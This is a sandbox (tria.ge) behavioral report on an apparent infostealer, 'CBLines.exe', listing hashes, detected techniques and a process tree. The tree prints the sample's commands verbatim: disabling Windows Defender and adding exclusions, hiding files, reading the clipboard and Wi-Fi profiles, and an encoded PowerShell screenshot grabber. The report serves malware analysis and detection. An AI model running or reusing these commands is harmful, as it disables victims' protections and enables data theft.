Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08/10/2024, 10:55
Behavioral task
behavioral1
Sample
CBLines.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
CBLines.exe
Resource
win10v2004-20241007-en
General
-
Target
CBLines.exe
-
Size
6.8MB
-
MD5
3007ee10af667a5b7a08383e1075ffeb
-
SHA1
235a92053da4068ffc5071f5c7283aabc1eacd15
-
SHA256
e461f6d4f4386add20a92e5e0a057b1b2373cf598ecb585f0b3c7a187070ad82
-
SHA512
b0a61f79c904d1cfec1c12a3335e8af04e6849671793f8dc2840d4f2b25f698b4712c576cf7228975fab72c820f5367f1822947eefb1db932e5c20de9cf32318
-
SSDEEP
98304:EnkwN+MdA5wqMmSd8MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DoDZDJ1n6hBnLD:EnV1J+B6ylnlPzf+JiJCsmFMvcn6hVvX
Malware Config
Signatures
-
pid Process 1820 powershell.exe 4368 powershell.exe 4544 powershell.exe 1208 powershell.exe 1784 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts CBLines.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4300 cmd.exe 3224 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4260 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe 1656 CBLines.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 672 tasklist.exe 3976 tasklist.exe 5028 tasklist.exe 1848 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3700 cmd.exe -
resource yara_rule behavioral2/files/0x000a000000023b81-21.dat upx behavioral2/memory/1656-25-0x00007FF901770000-0x00007FF901D5A000-memory.dmp upx behavioral2/files/0x000a000000023b74-27.dat upx behavioral2/files/0x000a000000023b7f-31.dat upx behavioral2/memory/1656-30-0x00007FF915440000-0x00007FF915463000-memory.dmp upx behavioral2/files/0x000a000000023b7b-48.dat upx behavioral2/files/0x000a000000023b7a-47.dat upx behavioral2/memory/1656-46-0x00007FF91A920000-0x00007FF91A92F000-memory.dmp upx behavioral2/files/0x000a000000023b79-45.dat upx behavioral2/files/0x000a000000023b78-44.dat upx behavioral2/files/0x000a000000023b77-43.dat upx behavioral2/files/0x000a000000023b76-42.dat upx behavioral2/files/0x000a000000023b75-41.dat upx behavioral2/files/0x000a000000023b73-40.dat upx behavioral2/files/0x000a000000023b86-39.dat upx behavioral2/files/0x000a000000023b85-38.dat upx behavioral2/files/0x000a000000023b84-37.dat upx behavioral2/files/0x000a000000023b80-34.dat upx behavioral2/files/0x000a000000023b7e-33.dat upx behavioral2/memory/1656-54-0x00007FF911800000-0x00007FF91182D000-memory.dmp upx behavioral2/memory/1656-56-0x00007FF9167D0000-0x00007FF9167E9000-memory.dmp upx behavioral2/memory/1656-58-0x00007FF911100000-0x00007FF911123000-memory.dmp upx behavioral2/memory/1656-60-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp upx behavioral2/memory/1656-62-0x00007FF9166C0000-0x00007FF9166D9000-memory.dmp upx behavioral2/memory/1656-64-0x00007FF9153C0000-0x00007FF9153CD000-memory.dmp upx behavioral2/memory/1656-66-0x00007FF911070000-0x00007FF91109E000-memory.dmp upx behavioral2/memory/1656-70-0x00007FF901770000-0x00007FF901D5A000-memory.dmp upx behavioral2/memory/1656-74-0x00007FF915440000-0x00007FF915463000-memory.dmp upx behavioral2/memory/1656-73-0x00007FF901240000-0x00007FF9015B5000-memory.dmp upx behavioral2/memory/1656-71-0x00007FF90B890000-0x00007FF90B948000-memory.dmp upx behavioral2/memory/1656-76-0x00007FF910B00000-0x00007FF910B14000-memory.dmp upx behavioral2/memory/1656-78-0x00007FF911800000-0x00007FF91182D000-memory.dmp upx behavioral2/memory/1656-79-0x00007FF9153B0000-0x00007FF9153BD000-memory.dmp upx behavioral2/memory/1656-84-0x00007FF900DF0000-0x00007FF900F0C000-memory.dmp upx behavioral2/memory/1656-83-0x00007FF9167D0000-0x00007FF9167E9000-memory.dmp upx behavioral2/memory/1656-129-0x00007FF911100000-0x00007FF911123000-memory.dmp upx behavioral2/memory/1656-176-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp upx behavioral2/memory/1656-208-0x00007FF9166C0000-0x00007FF9166D9000-memory.dmp upx behavioral2/memory/1656-273-0x00007FF911070000-0x00007FF91109E000-memory.dmp upx behavioral2/memory/1656-285-0x00007FF90B890000-0x00007FF90B948000-memory.dmp upx behavioral2/memory/1656-288-0x00007FF901240000-0x00007FF9015B5000-memory.dmp upx behavioral2/memory/1656-300-0x00007FF901770000-0x00007FF901D5A000-memory.dmp upx behavioral2/memory/1656-306-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp upx behavioral2/memory/1656-301-0x00007FF915440000-0x00007FF915463000-memory.dmp upx behavioral2/memory/1656-325-0x00007FF901770000-0x00007FF901D5A000-memory.dmp upx behavioral2/memory/1656-350-0x00007FF90B890000-0x00007FF90B948000-memory.dmp upx behavioral2/memory/1656-349-0x00007FF911070000-0x00007FF91109E000-memory.dmp upx behavioral2/memory/1656-348-0x00007FF9153C0000-0x00007FF9153CD000-memory.dmp upx behavioral2/memory/1656-347-0x00007FF9166C0000-0x00007FF9166D9000-memory.dmp upx behavioral2/memory/1656-346-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp upx behavioral2/memory/1656-345-0x00007FF911100000-0x00007FF911123000-memory.dmp upx behavioral2/memory/1656-344-0x00007FF9167D0000-0x00007FF9167E9000-memory.dmp upx behavioral2/memory/1656-343-0x00007FF911800000-0x00007FF91182D000-memory.dmp upx behavioral2/memory/1656-342-0x00007FF91A920000-0x00007FF91A92F000-memory.dmp upx behavioral2/memory/1656-341-0x00007FF915440000-0x00007FF915463000-memory.dmp upx behavioral2/memory/1656-340-0x00007FF901240000-0x00007FF9015B5000-memory.dmp upx behavioral2/memory/1656-339-0x00007FF900DF0000-0x00007FF900F0C000-memory.dmp upx behavioral2/memory/1656-338-0x00007FF9153B0000-0x00007FF9153BD000-memory.dmp upx behavioral2/memory/1656-337-0x00007FF910B00000-0x00007FF910B14000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2968 cmd.exe 3400 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 516 cmd.exe 4784 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2252 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5076 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3400 PING.EXE -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 1208 powershell.exe 1208 powershell.exe 4544 powershell.exe 4544 powershell.exe 1784 powershell.exe 1784 powershell.exe 3224 powershell.exe 3224 powershell.exe 404 powershell.exe 404 powershell.exe 3224 powershell.exe 1208 powershell.exe 1784 powershell.exe 4544 powershell.exe 404 powershell.exe 1820 powershell.exe 1820 powershell.exe 720 powershell.exe 720 powershell.exe 4368 powershell.exe 4368 powershell.exe 3792 powershell.exe 3792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5028 tasklist.exe Token: SeDebugPrivilege 3976 tasklist.exe Token: SeDebugPrivilege 1208 powershell.exe Token: SeIncreaseQuotaPrivilege 3636 WMIC.exe Token: SeSecurityPrivilege 3636 WMIC.exe Token: SeTakeOwnershipPrivilege 3636 WMIC.exe Token: SeLoadDriverPrivilege 3636 WMIC.exe Token: SeSystemProfilePrivilege 3636 WMIC.exe Token: SeSystemtimePrivilege 3636 WMIC.exe Token: SeProfSingleProcessPrivilege 3636 WMIC.exe Token: SeIncBasePriorityPrivilege 3636 WMIC.exe Token: SeCreatePagefilePrivilege 3636 WMIC.exe Token: SeBackupPrivilege 3636 WMIC.exe Token: SeRestorePrivilege 3636 WMIC.exe Token: SeShutdownPrivilege 3636 WMIC.exe Token: SeDebugPrivilege 3636 WMIC.exe Token: SeSystemEnvironmentPrivilege 3636 WMIC.exe Token: SeRemoteShutdownPrivilege 3636 WMIC.exe Token: SeUndockPrivilege 3636 WMIC.exe Token: SeManageVolumePrivilege 3636 WMIC.exe Token: 33 3636 WMIC.exe Token: 34 3636 WMIC.exe Token: 35 3636 WMIC.exe Token: 36 3636 WMIC.exe Token: SeDebugPrivilege 4544 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 1848 tasklist.exe Token: SeDebugPrivilege 3224 powershell.exe Token: SeIncreaseQuotaPrivilege 3636 WMIC.exe Token: SeSecurityPrivilege 3636 WMIC.exe Token: SeTakeOwnershipPrivilege 3636 WMIC.exe Token: SeLoadDriverPrivilege 3636 WMIC.exe Token: SeSystemProfilePrivilege 3636 WMIC.exe Token: SeSystemtimePrivilege 3636 WMIC.exe Token: SeProfSingleProcessPrivilege 3636 WMIC.exe Token: SeIncBasePriorityPrivilege 3636 WMIC.exe Token: SeCreatePagefilePrivilege 3636 WMIC.exe Token: SeBackupPrivilege 3636 WMIC.exe Token: SeRestorePrivilege 3636 WMIC.exe Token: SeShutdownPrivilege 3636 WMIC.exe Token: SeDebugPrivilege 3636 WMIC.exe Token: SeSystemEnvironmentPrivilege 3636 WMIC.exe Token: SeRemoteShutdownPrivilege 3636 WMIC.exe Token: SeUndockPrivilege 3636 WMIC.exe Token: SeManageVolumePrivilege 3636 WMIC.exe Token: 33 3636 WMIC.exe Token: 34 3636 WMIC.exe Token: 35 3636 WMIC.exe Token: 36 3636 WMIC.exe Token: SeDebugPrivilege 404 powershell.exe Token: SeDebugPrivilege 672 tasklist.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeDebugPrivilege 720 powershell.exe Token: SeIncreaseQuotaPrivilege 1052 WMIC.exe Token: SeSecurityPrivilege 1052 WMIC.exe Token: SeTakeOwnershipPrivilege 1052 WMIC.exe Token: SeLoadDriverPrivilege 1052 WMIC.exe Token: SeSystemProfilePrivilege 1052 WMIC.exe Token: SeSystemtimePrivilege 1052 WMIC.exe Token: SeProfSingleProcessPrivilege 1052 WMIC.exe Token: SeIncBasePriorityPrivilege 1052 WMIC.exe Token: SeCreatePagefilePrivilege 1052 WMIC.exe Token: SeBackupPrivilege 1052 WMIC.exe Token: SeRestorePrivilege 1052 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5116 wrote to memory of 1656 5116 CBLines.exe 84 PID 5116 wrote to memory of 1656 5116 CBLines.exe 84 PID 1656 wrote to memory of 1512 1656 CBLines.exe 87 PID 1656 wrote to memory of 1512 1656 CBLines.exe 87 PID 1656 wrote to memory of 1916 1656 CBLines.exe 88 PID 1656 wrote to memory of 1916 1656 CBLines.exe 88 PID 1656 wrote to memory of 3700 1656 CBLines.exe 90 PID 1656 wrote to memory of 3700 1656 CBLines.exe 90 PID 1656 wrote to memory of 872 1656 CBLines.exe 93 PID 1656 wrote to memory of 872 1656 CBLines.exe 93 PID 1656 wrote to memory of 2532 1656 CBLines.exe 96 PID 1656 wrote to memory of 2532 1656 CBLines.exe 96 PID 1656 wrote to memory of 1924 1656 CBLines.exe 95 PID 1656 wrote to memory of 1924 1656 CBLines.exe 95 PID 1656 wrote to memory of 4136 1656 CBLines.exe 99 PID 1656 wrote to memory of 4136 1656 CBLines.exe 99 PID 1656 wrote to memory of 4300 1656 CBLines.exe 100 PID 1656 wrote to memory of 4300 1656 CBLines.exe 100 PID 1656 wrote to memory of 1500 1656 CBLines.exe 102 PID 1656 wrote to memory of 1500 1656 CBLines.exe 102 PID 1924 wrote to memory of 3976 1924 cmd.exe 103 PID 1924 wrote to memory of 3976 1924 cmd.exe 103 PID 1656 wrote to memory of 3220 1656 CBLines.exe 152 PID 1656 wrote to memory of 3220 1656 CBLines.exe 152 PID 3700 wrote to memory of 4968 3700 cmd.exe 107 PID 3700 wrote to memory of 4968 3700 cmd.exe 107 PID 1916 wrote to memory of 4544 1916 cmd.exe 108 PID 1916 wrote to memory of 4544 1916 cmd.exe 108 PID 2532 wrote to memory of 5028 2532 cmd.exe 109 PID 2532 wrote to memory of 5028 2532 cmd.exe 109 PID 1656 wrote to memory of 516 1656 CBLines.exe 111 PID 1656 wrote to memory of 516 1656 CBLines.exe 111 PID 1656 wrote to memory of 2400 1656 CBLines.exe 112 PID 1656 wrote to memory of 2400 1656 CBLines.exe 112 PID 1512 wrote to memory of 1208 1512 cmd.exe 113 PID 1512 wrote to memory of 1208 1512 cmd.exe 113 PID 1656 wrote to memory of 880 1656 CBLines.exe 114 PID 1656 wrote to memory of 880 1656 CBLines.exe 114 PID 1656 wrote to memory of 2356 1656 CBLines.exe 117 PID 1656 wrote to memory of 2356 1656 CBLines.exe 117 PID 4136 wrote to memory of 3636 4136 cmd.exe 120 PID 4136 wrote to memory of 3636 4136 cmd.exe 120 PID 872 wrote to memory of 1784 872 cmd.exe 121 PID 872 wrote to memory of 1784 872 cmd.exe 121 PID 3220 wrote to memory of 2436 3220 cmd.exe 122 PID 3220 wrote to memory of 2436 3220 cmd.exe 122 PID 4300 wrote to memory of 3224 4300 cmd.exe 124 PID 4300 wrote to memory of 3224 4300 cmd.exe 124 PID 1500 wrote to memory of 1848 1500 cmd.exe 125 PID 1500 wrote to memory of 1848 1500 cmd.exe 125 PID 1656 wrote to memory of 1424 1656 CBLines.exe 144 PID 1656 wrote to memory of 1424 1656 CBLines.exe 144 PID 516 wrote to memory of 4784 516 cmd.exe 128 PID 516 wrote to memory of 4784 516 cmd.exe 128 PID 2356 wrote to memory of 404 2356 cmd.exe 129 PID 2356 wrote to memory of 404 2356 cmd.exe 129 PID 2400 wrote to memory of 5076 2400 cmd.exe 130 PID 2400 wrote to memory of 5076 2400 cmd.exe 130 PID 880 wrote to memory of 2460 880 cmd.exe 131 PID 880 wrote to memory of 2460 880 cmd.exe 131 PID 1424 wrote to memory of 1704 1424 cmd.exe 132 PID 1424 wrote to memory of 1704 1424 cmd.exe 132 PID 1656 wrote to memory of 4752 1656 CBLines.exe 133 PID 1656 wrote to memory of 4752 1656 CBLines.exe 133 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4968 attrib.exe 5036 attrib.exe 3768 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\CBLines.exe"C:\Users\Admin\AppData\Local\Temp\CBLines.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Users\Admin\AppData\Local\Temp\CBLines.exe"C:\Users\Admin\AppData\Local\Temp\CBLines.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CBLines.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CBLines.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CBLines.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\CBLines.exe"4⤵
- Views/modifies file attributes
PID:4968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:2436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
